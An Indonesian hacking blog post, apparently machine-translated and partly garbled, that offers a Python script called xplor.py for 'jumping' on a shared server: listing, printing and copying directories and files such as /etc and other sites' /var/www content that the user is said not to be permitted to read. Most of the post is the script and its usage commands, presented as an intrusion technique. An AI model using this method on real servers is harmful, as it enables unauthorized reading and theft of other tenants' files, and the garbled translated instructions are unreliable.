Server Bypass melalui symlink - Jumping Bagian 2 - Salam X-WaHz All About Info :) Mari kita pergi dengan metode berikutnya dari server symlink melewati, seperti u melihat dan ke dalam sebelum posting sekarang saya akan menjelaskan trik baru dengan lainnya kita akan berbicara tentang alat lain yang menggunakan izin python untuk membaca folder lain / file dalam server yang sama. Alat yang disebut xplor.py dan di sini itu sumbernya
#!/usr/bin/env python
# devilzc0de.org (c) 2012
import sys
import os
def copyfile(source, dest, buffer_size=1024*1024):
if not hasattr(source, 'read'):
source = open(source, 'rb')
if not hasattr(dest, 'write'):
dest = open(dest, 'wb')
while 1:
copy_buffer = source.read(buffer_size)
if copy_buffer:
dest.write(copy_buffer)
else:
break
source.close()
dest.close()
if __name__=="__main__":
if not len(sys.argv) == 3 and not len(sys.argv) == 2:
sys.stdout.write('usage : python ' + os.path.basename(sys.argv[0]) + ' [path to dir/file] [path to save file]\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue issue_new_copy\r\n')
sys.exit(1)
target = sys.argv[1].replace("\\","/")
if os.path.isdir(target):
if not target.endswith("/"):
target = target + "/"
dir = os.listdir(target)
for d in dir:
fs = ""
if os.path.isdir(target + d):
fs = "[ DIR ]"
elif os.path.isfile(target + d):
fs = os.path.getsize(target + d)
fs = str(fs)
sys.stdout.write(fs.rjust(12, " ") + " " + d + "\r\n")
elif os.path.isfile(target):
if len(sys.argv) == 3:
copyfile(target, sys.argv[2])
else:
f = open(target, "rb")
try:
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
while byte != "":
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
finally:
f.close()
else:
sys.stdout.write("Can't found file or folder : " + target)
Pengguna alat untuk melihat folder di mana tidak memiliki izin untuk membaca di dalam python xplor.py / var / www / index.php
Melihat file dalam folder tidak ada akses. python xplor.py / var / www / index.php
menyalin / menyimpan file ur python xplor.py / var / www / indro / ketek.jpg
Dan yeah file itu ada di sini akses
Yeahh itu diberikan Beberapa u hal yang dapat Anda lakukan dengan script-script lain
Sumber
0 komentar:
Speak up your mind
Tell us what you're thinking... !